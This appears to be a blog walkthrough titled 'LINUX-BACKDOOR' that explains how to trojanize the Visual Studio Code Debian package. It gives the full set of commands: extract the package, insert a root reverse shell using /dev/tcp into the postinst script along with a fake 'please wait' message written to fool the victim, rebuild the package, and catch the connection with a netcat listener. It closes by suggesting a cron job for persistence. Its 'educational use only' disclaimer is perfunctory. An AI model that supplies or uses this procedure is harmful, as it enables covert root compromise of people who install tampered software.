LINUX-BACKDOOR

Mr Robot

Educational use only. Unauthorized use is illegal, else you might learn the hard way. Don’t Play!

Welcome Folks!

Today, I decided to post a simple walkthrough showing how to inject a backdoor into a linux debian package(.deb).

A Backdoor is simply a payload/malware that is secretly planted into a computer or software for unauthorized access.

To get started, we need a debian package to inject the backdoor into. You can download any debian package, but I’ll be making use of the visual studio code debian package. You can grab it here: Visual_Studio.deb.

First Step is to download the package and extract using the command below.

dpkg -x code_1.108.2-1769004815_amd64.deb code_pack

code_pack is the new directory we extracted to, you can name it anything you like. Screenshot (46)

Confirm you now have the code_pack directory using “ls”.

Next we need to extract the control and postinst files, these are the files we will be using to embed the backdoor into the package before rebuilding. To do this, we will extract the package again using:

ar -x code_1.108.2-1769004815_amd64.deb code_pack
Screenshot (47)

After extracting, you see a file name “control.tar.xz”. Now extract the file tar package using:

tar -xvf  control.tar.xz

We now have the postinst and control files we need. Screenshot (50)

Go to the code_pack directory and create a sub directory called “DEBIAN”. Copy the postinst and control files we extracted to this DEBIAN directory. Screenshot (51).

We now have the two files in the DEBIAN directory, next is to edit the postinst file with any file editor of your choice(nano or vim). I will be using vim

sudo vim postinst

Now inject the highlighted payloads into the lines of code, together with a message telling the victim to wait while the package is installing.

sudo bash -i >& /dev/tcp/192.168.100.13/2020 0>&1
echo "Please wait, this might take sometime to install....."
Screenshot (53)

Replace ip address and port number with your local machine’s.

Save and close the file when you’re done. Then change permission of the two files to 755 using chmod:

chmod 755 postinst control

Repack the code_pack back to the deb package with:

sudo dpkg-deb --build code_pack/

Might take sometime to repack, then you see the code_pack.deb package after. Screenshot (57) Screenshot (58)

Next thing is to open a netcat connection on the attacker machine and make sure the ip address and port number correlates with what you injected in the payload so as to listen for a reverse connection from the victim’s system and have remote access. The ip address and port number used was 192.168.100.13 and 2020, so:

nc -lvp 2020

After this, we need to transfer the new code_pack.deb we just repacked to the victim machine. You can use any data delivery method you want (flash drives, ssh, python server, any…). Just get it transferred to the victim system

Once transferred, Let’s assume you’re the victom, install the package on the victim’s system using:

sudo dpkg -i code_pack.deb
Screenshot (55)

You can see it is stuck while installing with a message saying “please wait, this might take sometime to install”. This is just to fool the victim, letting him think it’s taking time to install while the attacker is controlling his system. If we we switch back to the attacker machine, we can see we have remote access while the victim still waits for the never ending installation process. Screenshot (54) Screenshot (56)

Finally, once you establish remote access to the root account from the attacker machine, you can schedule as a cron job to install the package at a given duration which gives you persistence.